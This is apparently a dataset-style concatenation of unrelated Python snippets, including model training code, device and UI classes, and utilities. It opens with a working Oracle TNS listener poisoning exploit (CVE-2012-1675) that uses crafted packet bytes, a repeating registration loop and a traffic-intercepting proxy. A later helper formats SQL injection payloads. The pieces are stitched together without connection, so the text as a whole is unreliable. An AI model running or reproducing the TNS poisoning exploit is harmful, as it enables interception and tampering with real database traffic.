PACKET_TNSPOISON_SID_12 = b'\x05\xc2\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xb8$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xb0\xe9I\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5*\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00D\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa8H\x0b\x00\x00\x00\x003\x168s\x02jE\xe5\xbe\xd1\xbag\xce\xdc\xc6\x05\r\x00\x00\x00\x00\x00\x00\x00\xc0E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02D\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5*\x0b\x00\x00\x00\x00orcl\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xf8\xd3\xf2\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xd3\xf2\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00H\xa7H\x0b\x00\x00\x00\x00orclXDB\x00\x10\x00\x00\x00\x00\x00\x00\x00\xf8\xd3\xf2\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orclXDB\x00\x01\x00\x00\x00\r\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xf8\xce\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xa6H\x0b\x00\x00\x00\x00orcl\x00\r\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc*\x0b\x00\x00\x00\x00orcl\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0_\xf1\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfD\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xa9H\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xb0_\xf1\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xa5H\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe8\x97H\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fD\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8H\x0b\x00\x00\x00\\xfa\xe7:\x1b{B\x95\xb0\xb6\x840e\xb0\xc0\x01\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xb8\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfD\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xb09\xea\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x97H\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49218))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2480>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb*\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99*\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00v\xeeK\xd5_#\x8fHa\xb3\xd5\x8d\xccQ\xd0\xd3\xf2\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00hE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb*\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x10\x00\x00\x00\x00\x00\x00\x00\xf8\xd3\xf2\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orclXDB\x00\xf8\xce\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc*\x0b\x00\x00\x00\x00orcl\x00'
DEFAULT_LOCAL_IP_PACKET_TNSPOISON = b'192.168.133.1 '
DEFAULT_TARGET_PORT_PACKET_TNSPOISON = b'1521'
DEFAULT_LOCAL_PORT_PACKET_TNSPOISON = b'9999'
DEFAULT_SID_PACKET_TNSPOISON_SID_2 = b'or'
DEFAULT_SID_PACKET_TNSPOISON_SID_3 = b'orc'
DEFAULT_SID_PACKET_TNSPOISON_SID_4 = b'orcl'
DEFAULT_SID_PACKET_TNSPOISON_SID_5 = b'orcl1'
DEFAULT_SID_PACKET_TNSPOISON_SID_6 = b'orcl12'
DEFAULT_SID_PACKET_TNSPOISON_SID_7 = b'orcl123'
DEFAULT_SID_PACKET_TNSPOISON_SID_8 = b'orcl1234'
DEFAULT_SID_PACKET_TNSPOISON_SID_9 = b'orcl12345'
DEFAULT_SID_PACKET_TNSPOISON_SID_10 = b'orcl123456'
DEFAULT_SID_PACKET_TNSPOISON_SID_11 = b'orcl1234567'
DEFAULT_SID_PACKET_TNSPOISON_SID_12 = b'orcl'
GOOD_STRINGS_IN_TNS_POISON_RESPONSE = [b'XDB', b'xdb']
def __init__(self, args):
logging.debug('Tnspoison object created')
Tnscmd.__init__(self, args)
def isTNSListenerVulnerableToCVE_2012_1675(self):
if (self.args['sid'] == None):
logging.info('SID is not given. Impossible to check if target is vulnerable to TNS poisoning')
return (- 1)
return self.exploitTNSPoisoningAttack(checkOnly=True)
def __sendTNSpoisoningPackets__(self, localIp, localListeningPort=DEFAULT_LOCAL_LISTENING_PORT_TNS_POISON):
poisonPacket = ''
logging.debug('Making the TNS poisong packet...')
if (len(self.args['sid']) == 2):
logging.debug('SID of 2 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_2
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_2, self.args['sid'].encode())
elif (len(self.args['sid']) == 3):
logging.debug('SID of 3 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_3
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_3, self.args['sid'].encode())
elif (len(self.args['sid']) == 4):
logging.debug('SID of 4 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_4
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_4, self.args['sid'].encode())
elif (len(self.args['sid']) == 5):
logging.debug('SID of 5 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_5
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_5, self.args['sid'].encode())
elif (len(self.args['sid']) == 6):
logging.debug('SID of 6 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_6
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_6, self.args['sid'].encode())
elif (len(self.args['sid']) == 7):
logging.debug('SID of 7 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_7
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_7, self.args['sid'].encode())
elif (len(self.args['sid']) == 8):
logging.debug('SID of 8 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_8
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_8, self.args['sid'].encode())
elif (len(self.args['sid']) == 9):
logging.debug('SID of 9 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_9
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_9, self.args['sid'].encode())
elif (len(self.args['sid']) == 10):
logging.debug('SID of 10 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_10
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_10, self.args['sid'].encode())
elif (len(self.args['sid']) == 11):
logging.debug('SID of 11 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_11
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_11, self.args['sid'].encode())
elif (len(self.args['sid']) == 12):
logging.debug('SID of 12 chars long, sending the good poisoning packet...')
poisonPacket = self.PACKET_TNSPOISON_SID_12
poisonPacket = poisonPacket.replace(self.DEFAULT_SID_PACKET_TNSPOISON_SID_12, self.args['sid'].encode())
else:
logging.warn('The SID is too short or too long. SID should be >=1 and <=12')
return (- 2)
poisonPacket = poisonPacket.replace(self.DEFAULT_LOCAL_IP_PACKET_TNSPOISON, localIp.ljust(15, ' ').encode())
poisonPacket = poisonPacket.replace(self.DEFAULT_LOCAL_PORT_PACKET_TNSPOISON, str(localListeningPort).encode())
poisonPacket = poisonPacket.replace(self.DEFAULT_TARGET_PORT_PACKET_TNSPOISON, str(self.args['port']).encode())
while 1:
logging.info('Exploiting the TNS poisoning attack...')
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect((self.args['server'], int(self.args['port'])))
logging.debug('Sending a REGISTER packet from your IP {2}\xa0to the TNS listener {0}:{1}...'.format(self.args['server'], self.args['port'], localIp))
sk.send(self.PACKET_REGISTER)
if (self.args['show_sql_requests'] == True):
logging.debug('REGISTER packet sent: {0}'.format(repr(self.PACKET_REGISTER)))
response = sk.recv(8192)
if (self.args['show_sql_requests'] == True):
logging.debug('Packet received: {0}'.format(repr(response)))
sk.send(poisonPacket)
if (self.args['show_sql_requests'] == True):
logging.debug('Poisoning packet sent: {0}'.format(repr(poisonPacket)))
response = sk.recv(8192)
if (self.args['show_sql_requests'] == True):
logging.debug('Packet received: {0}'.format(repr(response)))
for aString in self.GOOD_STRINGS_IN_TNS_POISON_RESPONSE:
if (aString in response):
logging.debug('Response sent by database server considered as good. Continue to send TNS poisoning packets')
break
logging.info('Sleeping {0} secs'.format(DEFAULT_SLEEPING_TIME_TNS_POISON))
sleep(DEFAULT_SLEEPING_TIME_TNS_POISON)
sk.close()
def __startProxy__(self, localIp, localPort, connectionString=None, replaceStr=[None, None]):
logging.debug('The local proxy will listening on {0}:{1} and it will redirecto traffic to {2}:{3}'.format(localIp, localPort, self.args['server'], self.args['port']))
forwarder(ip=localIp, port=localPort, args=self.args, connectionString=connectionString, replaceStr=replaceStr)
asyncore.loop()
def exploitTNSPoisoningAttack(self, checkOnly=False):
ERROR_STR = ['(ERROR_STACK=(ERROR=', '(DESCRIPTION=(ERR=']
logging.info('Checking if the target is vulnerable to TNS poisoning attack...')
status = self.getInformation(cmd='service_register_NSGR')
if (status == False):
logging.debug('Error unknow with the TNS command sent')
return (- 1)
else:
for anError in ERROR_STR:
if (anError in self.recvdata):
logging.debug("'{0}' in target's response after registration command: not vulnerable".format(ERROR_STR))
return False
else:
logging.debug('Target is vulnerable to CVE-2012-1675 because there is no error in the reponse after registration command')
if (checkOnly == True):
return True
else:
localListeningPort = int(self.args['listening-port'])
logging.debug('Starting the local proxy on {0}:{1} in a new thread'.format(self.localIP, localListeningPort))
a = Thread(None, self.__startProxy__, None, (), {'localIp': self.localIP, 'localPort': localListeningPort, 'connectionString': self.args['cstring'], 'replaceStr': self.args['replace']})
a.daemon = True
a.start()
logging.debug('Waiting 3 seconds while the proxy is starting')
sleep(3)
logging.debug('Starting TNS poisoning in a new thread...')
b = Thread(None, self.__sendTNSpoisoningPackets__, None, (), {'localIp': self.localIP, 'localListeningPort': localListeningPort})
b.daemon = True
b.start()
try:
while 1:
sleep(self.args['sleeptime'])
except KeyboardInterrupt:
logging.info('Keyboard Interrupt => attack stopped')
return True
def testAll(self):
self.args['print'].title('Is it vulnerable to TNS poisoning (CVE-2012-1675)?')
status = self.isTNSListenerVulnerableToCVE_2012_1675()
if (status == None):
self.args['print'].unknownNews('Impossible to know if target is vulnerable to a remote TNS poisoning because error.')
elif (status == (- 1)):
self.args['print'].unknownNews('Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.')
elif (status == True):
self.args['print'].goodNews('The target is vulnerable to a remote TNS poisoning')
else:
self.args['print'].badNews('The target is not vulnerable to a remote TNS poisoning') |
def session(device):
with tf.device(device):
graph = tf.Graph()
with graph.as_default():
model = tf.keras.Sequential((tf.keras.layers.Conv2D(32, kernel_size=3, input_shape=(28, 28, 3), activation='relu'), tf.keras.layers.Conv2D(64, kernel_size=3)))
init = tf.compat.v1.global_variables_initializer()
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.compat.v1.Session(graph=graph, config=config)
sess.run(init)
sess.__setattr__(BNF, 0)
sess.__setattr__(CLE, 0)
sess.__setattr__(ADA, 0)
return sess |
class AttributeDevice(Switch):
EVENT_TYPE_ATTRIBUTE_LIST = 'attributeList'
_state_property: str
_attr_name = '_attributes'
def __init__(self, *args: Any, **kwargs: Any) -> None:
assert isinstance(self._state_property, str)
setattr(self, self._attr_name, {})
class_hints = get_type_hints(type(self))
assert ((attr_type := class_hints.get(self._attr_name)) is not None)
self._attribute_type_hints = get_type_hints(attr_type)
super().__init__(*args, **kwargs)
self.update_attributes()
def _required_services(self) -> list[RequiredService]:
return (super()._required_services + [RequiredService(name='deviceevent', actions=['GetAttributes', 'SetAttributes'])])
def _update_attributes_dict(self, xml_blob: str) -> None:
xml_blob = (('<attributes>' + xml_blob) + '</attributes>')
xml_blob = xml_blob.replace('>', '>')
xml_blob = xml_blob.replace('<', '<')
for attribute in et.fromstring(xml_blob, parser=et.XMLParser(resolve_entities=False)):
if (len(attribute) < 2):
raise ValueError(f'Too few elements: {et.tostring(attribute).decode()}')
if ((key := attribute[0].text) is None):
raise ValueError(f'Key is not present: {et.tostring(attribute[0]).decode()}')
if ((value := attribute[1].text) is None):
raise ValueError(f'Value is not present: {et.tostring(attribute[1]).decode()}')
if ((constructor := self._attribute_type_hints.get(key)) is None):
continue
try:
getattr(self, self._attr_name)[key] = constructor(value)
except (TypeError, ValueError) as err:
raise ValueError(f'Unexpected value for {key}: {value}') from err
state: (int | None) = getattr(self, self._state_property)
self._state = state
def update_attributes(self) -> None:
resp = self.deviceevent.GetAttributes().get(self.EVENT_TYPE_ATTRIBUTE_LIST)
assert (resp is not None)
self._update_attributes_dict(resp)
def subscription_update(self, _type: str, _params: str) -> bool:
if (_type == self.EVENT_TYPE_ATTRIBUTE_LIST):
try:
self._update_attributes_dict(_params)
except (et.XMLSyntaxError, ValueError) as err:
LOG.error('Unexpected %s value `%s` for device %s: %s', self.EVENT_TYPE_ATTRIBUTE_LIST, _params, self.name, repr(err))
return True
return super().subscription_update(_type, _params)
def get_state(self, force_update: bool=False) -> int:
if (force_update or (self._state is None)):
self.update_attributes()
assert (self._state is not None)
return self._state
def _set_attributes(self, *args: tuple[(str, ((str | int) | float))]) -> None:
attribute_xml = '</attribute><attribute>'.join((f'<name>{name}</name><value>{value}</value>' for (name, value) in args))
attribute_xml = f'<attribute>{attribute_xml}</attribute>'
self.deviceevent.SetAttributes(attributeList=quote_xml(attribute_xml))
self.get_state(True) |
def resolve_file(filename, relroot=None):
resolved = os.path.normpath(filename)
resolved = os.path.expanduser(resolved)
if (not os.path.isabs(resolved)):
if (not relroot):
relroot = os.getcwd()
elif (not os.path.isabs(relroot)):
raise NotImplementedError(relroot)
resolved = os.path.join(relroot, resolved)
return resolved |
def sa_scaffold_hop() -> GoalDirectedBenchmark:
specification = uniform_specification(1, 10, 100)
benchmark_object = scaffold_hop()
sa_biased = ScoringFunctionSAWrapper(benchmark_object.objective, SAScoreModifier())
return GoalDirectedBenchmark(name='SA_scaffold_hop', objective=sa_biased, contribution_specification=specification) |
class FitEcmBurstScanresDampsGraph(FitGraph):
hidden = True
internalName = 'ecmBurstScanresDamps'
name = 'ECM Burst + Scanres Damps'
xDefs = [XDef(handle='tgtDps', unit=None, label='Enemy DPS', mainInput=('tgtDps', None)), XDef(handle='tgtScanRes', unit='mm', label='Enemy scanres', mainInput=('tgtScanRes', 'mm'))]
yDefs = [YDef(handle='srcDmg', unit=None, label='Damage inflicted'), YDef(handle='tgtLockTime', unit='s', label='Lock time'), YDef(handle='tgtLockUptime', unit='s', label='Lock uptime')]
inputs = [Input(handle='tgtScanRes', unit='mm', label='Enemy scanres', iconID=74, defaultValue=700, defaultRange=(100, 1000)), Input(handle='tgtDps', unit=None, label='Enemy DPS', iconID=1432, defaultValue=200, defaultRange=(100, 600)), Input(handle='uptimeAdj', unit='s', label='Uptime adjustment', iconID=1392, defaultValue=1, defaultRange=(None, None), conditions=[(None, ('srcDmg', None))]), Input(handle='uptimeAmtLimit', unit=None, label='Max amount of uptimes', iconID=1397, defaultValue=3, defaultRange=(None, None), conditions=[(None, ('srcDmg', None))])]
checkboxes = [InputCheckbox(handle='applyDamps', label='Apply sensor dampeners', defaultValue=True), InputCheckbox(handle='applyDrones', label='Use drones', defaultValue=True, conditions=[(None, ('srcDmg', None))])]
srcExtraCols = ('SigRadius', 'Damp ScanRes')
_limiters = {'tgtScanRes': (lambda src, tgt: (1, math.inf))}
_getters = {('tgtScanRes', 'tgtLockTime'): TgtScanRes2TgtLockTimeGetter, ('tgtScanRes', 'tgtLockUptime'): TgtScanRes2TgtLockUptimeGetter, ('tgtScanRes', 'srcDmg'): TgtScanRes2SrcDmgGetter, ('tgtDps', 'srcDmg'): TgtDps2SrcDmgGetter} |
class Image_Dataset(object):
def __init__(self, image_dir, transform=None, image_ext=['.jpg', '.bmp', '.png']):
assert (transform is not None)
self._transform = transform
self.image_dir = image_dir
self.image_ext = image_ext
self._read_dataset()
def __getitem__(self, index):
assert (index < self._dataset_size)
image = None
label = None
img_path = self._data['path'][index]
image = Image.open(img_path).convert('RGB')
frame_ids = self._data['frames_ids'][index]
image = self._transform(image)
sample = {'image': image, 'path': img_path, 'index': index, 'frames_ids': frame_ids}
return sample
def _read_dataset(self):
frames_paths = glob.glob(os.path.join(self.image_dir, '*'))
frames_paths = [x for x in frames_paths if any([(ext in x) for ext in self.image_ext])]
frames_paths = sorted(frames_paths, key=(lambda x: int(os.path.basename(x).split('.')[0].split('_')[(- 1)])))
self._data = {'path': frames_paths, 'frames_ids': [int(os.path.basename(p).split('.')[0].split('_')[(- 1)]) for p in frames_paths]}
self._ids = np.arange(len(self._data['path']))
self._dataset_size = len(self._ids)
def __len__(self):
return self._dataset_size |
def clean_up_offset_payload(payload):
if ('0,' in payload):
payload = '{index},'.join(payload.rsplit('0,'))
if ('OFFSET' in payload):
payload = 'OFFSET {index} '.join(payload.rsplit('OFFSET 0'))
if ('DB_NAME' in payload):
payload = payload.replace('DB_NAME(0)', 'DB_NAME({index})')
if ('TOP 0' in payload):
payload = 'TOP {index}'.join(payload.rsplit('TOP 0'))
logger.debug(payload)
return payload |
def ignore_exceptions(func):
assert asyncio.iscoroutinefunction(func), 'func needs to be a coroutine'
async def wrapper(*args, **kwargs):
try:
return (await func(*args, **kwargs))
except asyncio.CancelledError:
raise
except Exception as e:
pass
return wrapper |
def main():
args = parse_args()
cfg = get_cfg(args)
cudnn.benchmark = True
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = os.path.join(cfg.work_dir, f'{timestamp}.cfg')
with open(log_file, 'a') as f:
f.write(cfg.pretty_text)
logger = build_logger(cfg.work_dir, cfgname='train_source')
writer = SummaryWriter(log_dir=os.path.join(cfg.work_dir, f'tensorboard'))
loader_dict = {}
train_set = build_dataset(cfg.data.train)
val_set = build_dataset(cfg.data.val)
loader_dict['src_train'] = DataLoader(train_set, batch_size=cfg.batch_size, shuffle=True, num_workers=cfg.num_workers, drop_last=True)
loader_dict['src_val'] = DataLoader(val_set, batch_size=cfg.batch_size, shuffle=True, num_workers=cfg.num_workers, drop_last=False)
print(f'==> DataLoader built.')
model = build_model(cfg.model)
nn.init.xavier_normal_(model.fc.weight)
model = torch.nn.DataParallel(model).cuda()
train_criterion = build_loss(cfg.loss.train).cuda()
val_criterion = build_loss(cfg.loss.val).cuda()
base_params = [v for (k, v) in model.named_parameters() if ('fc' not in k)]
head_params = [v for (k, v) in model.named_parameters() if ('fc' in k)]
param_groups = [{'params': base_params, 'lr': (cfg.lr * 0.1)}, {'params': head_params, 'lr': cfg.lr}]
optimizer = build_optimizer(cfg.optimizer, param_groups)
for param_group in optimizer.param_groups:
param_group['init_lr'] = param_group['lr']
print('==> Model built.')
print('==> Start training...')
model.train()
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
val_meter = TrackMeter()
start_iter = 1
train_iters = (cfg.epochs * len(loader_dict['src_train']))
val_interval = len(loader_dict['src_train'])
end = time.time()
iter_source = iter(loader_dict['src_train'])
for it in range(start_iter, (train_iters + 1)):
adjust_lr(optimizer, it, train_iters, power=0.75)
try:
(images, labels) = next(iter_source)
except StopIteration:
iter_source = iter(loader_dict['src_train'])
(images, labels) = next(iter_source)
images = images.cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
bsz = images.shape[0]
targets = torch.zeros(bsz, cfg.num_classes).cuda().scatter_(1, labels.view((- 1), 1), 1)
targets = (((1 - cfg.eps) * targets) + (cfg.eps / cfg.num_classes))
output = model(images)
loss = train_criterion(output, targets)
losses.update(loss.item(), bsz)
(acc1, acc5) = accuracy(output, labels, topk=(1, 5))
top1.update(acc1[0], bsz)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_time.update((time.time() - end))
end = time.time()
if ((it == start_iter) or ((it % cfg.log_interval) == 0)):
lr = optimizer.param_groups[0]['lr']
logger.info(f'Iter [{it}/{train_iters}] - batch_time: {batch_time.avg:.3f}, lr: {lr:.5f}, loss: {losses.avg:.3f}, train_: {top1.avg:.2f}')
writer.add_scalar(f'lr', lr, it)
writer.add_scalar(f'Loss/src_train', losses.avg, it)
writer.add_scalar(f'Acc/src_train', top1.avg, it)
if (((it % val_interval) == 0) or (it == train_iters)):
val_acc = val(loader_dict['src_val'], model, val_criterion, it, logger, writer)
if (val_acc >= val_meter.max_val):
model_path = os.path.join(cfg.work_dir, f'best_val.pth')
state_dict = {'optimizer_state': optimizer.state_dict(), 'model_state': model.state_dict(), 'iter': it}
torch.save(state_dict, model_path)
val_meter.update(val_acc, idx=it)
logger.info(f'Best val_: {val_meter.max_val:.2f} (iter={val_meter.max_idx}).')
model.train()
model_path = os.path.join(cfg.work_dir, 'last.pth')
state_dict = {'optimizer_state': optimizer.state_dict(), 'model_state': model.state_dict(), 'iter': train_iters}
torch.save(state_dict, model_path) |
_start_docstrings('\n BiT Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for\n ImageNet.\n ', BIT_START_DOCSTRING)
class BitForImageClassification(BitPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bit = BitModel(config)
self.classifier = nn.Sequential(nn.Flatten(), (nn.Linear(config.hidden_sizes[(- 1)], config.num_labels) if (config.num_labels > 0) else nn.Identity()))
self.post_init()
_start_docstrings_to_model_forward(BIT_INPUTS_DOCSTRING)
_code_sample_docstrings(checkpoint=_IMAGE_CLASS_CHECKPOINT, output_type=ImageClassifierOutputWithNoAttention, config_class=_CONFIG_FOR_DOC, expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT)
def forward(self, pixel_values: Optional[torch.FloatTensor]=None, labels: Optional[torch.LongTensor]=None, output_hidden_states: Optional[bool]=None, return_dict: Optional[bool]=None) -> ImageClassifierOutputWithNoAttention:
return_dict = (return_dict if (return_dict is not None) else self.config.use_return_dict)
outputs = self.bit(pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict)
pooled_output = (outputs.pooler_output if return_dict else outputs[1])
logits = self.classifier(pooled_output)
loss = None
if (labels is not None):
if (self.config.problem_type is None):
if (self.num_labels == 1):
self.config.problem_type = 'regression'
elif ((self.num_labels > 1) and ((labels.dtype == torch.long) or (labels.dtype == torch.int))):
self.config.problem_type = 'single_label_classification'
else:
self.config.problem_type = 'multi_label_classification'
if (self.config.problem_type == 'regression'):
loss_fct = MSELoss()
if (self.num_labels == 1):
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif (self.config.problem_type == 'single_label_classification'):
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view((- 1), self.num_labels), labels.view((- 1)))
elif (self.config.problem_type == 'multi_label_classification'):
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if (not return_dict):
output = ((logits,) + outputs[2:])
return (((loss,) + output) if (loss is not None) else output)
return ImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states) |
def crop(text, width=None, suffix='[...]'):
width = (width if width else settings.CLIENT_DEFAULT_WIDTH)
ltext = len(text)
if (ltext <= width):
return text
else:
lsuffix = len(suffix)
text = (text[:width] if (lsuffix >= width) else ('%s%s' % (text[:(width - lsuffix)], suffix)))
return to_str(text) |
class CacheMixin():
def _apply_cache_config(cls, encoders: Union[(Encoder, Dict[(str, Encoder)])], cache_config: CacheConfig) -> Union[(Encoder, Dict[(str, Encoder)])]:
if (cache_config.cache_type == CacheType.NONE):
return encoders
if ((not cache_config.cache_type) and (not cache_config.mapping)):
raise ValueError('If cache is configured, cache_type or mapping have to be set')
if isinstance(encoders, Encoder):
return cls._wrap_encoder(encoders, cache_config=cache_config)
cached_encoders = {}
for (encoder_name, encoder) in encoders.items():
cached_encoders[encoder_name] = cls._wrap_encoder(encoder, cache_config=cache_config, encoder_name=encoder_name)
return {**encoders, **cached_encoders}
def _check_cuda(cache_type: CacheType, encoder_name: str) -> None:
if ((cache_type == CacheType.GPU) and (not torch.cuda.is_available())):
raise ValueError(f'`CacheType.GPU` has been chosen for `{encoder_name}` encoder, but cuda is not available')
def _wrap_encoder(cls, encoder: Encoder, cache_config: CacheConfig, encoder_name: str='') -> Encoder:
if isinstance(encoder, CacheEncoder):
return encoder
if encoder.trainable:
if (encoder_name in cache_config.mapping):
raise ValueError(f"Can't configure cache for encoder {encoder_name}. Encoder must be frozen to cache it")
return encoder
cache_type = (cache_config.mapping.get(encoder_name) or cache_config.cache_type)
if (cache_type is None):
logger.info(f"{encoder_name} haven't been cached, but could be as non-trainable encoders")
return encoder
cls._check_cuda(cache_type, encoder_name)
return InMemoryCacheEncoder(encoder, cache_type)
def _cache(cls, trainer: pl.Trainer, encoders: Dict[(str, Encoder)], train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader], cache_config: CacheConfig) -> bool:
cache_encoders = {name: encoder for (name, encoder) in encoders.items() if isinstance(encoder, CacheEncoder)}
if (not cache_encoders):
return False
is_full_cache_possible = ((len(cache_encoders) == len(encoders)) and (not cache_config.key_extractors) and (train_dataloader.num_workers == 0) and ((val_dataloader.num_workers == 0) if (val_dataloader is not None) else True))
if is_full_cache_possible:
logger.debug('Using full cache')
if (cache_config.key_extractors and (not isinstance(cache_config.key_extractors, dict))):
key_extractors = {name: cache_config.key_extractors for name in cache_encoders.keys()}
else:
key_extractors = cache_config.key_extractors
cache_collator = CacheTrainCollator(pre_collate_fn=train_dataloader.pre_collate_fn, encoder_collates={name: encoder.get_collate_fn() for (name, encoder) in encoders.items()}, meta_extractors={name: encoder.get_meta_extractor() for (name, encoder) in encoders.items()}, key_extractors=key_extractors, cachable_encoders=list(cache_encoders.keys()), mode=CacheMode.TRAIN)
train_dataloader.collate_fn = cache_collator
if (val_dataloader is not None):
val_dataloader.collate_fn = cache_collator
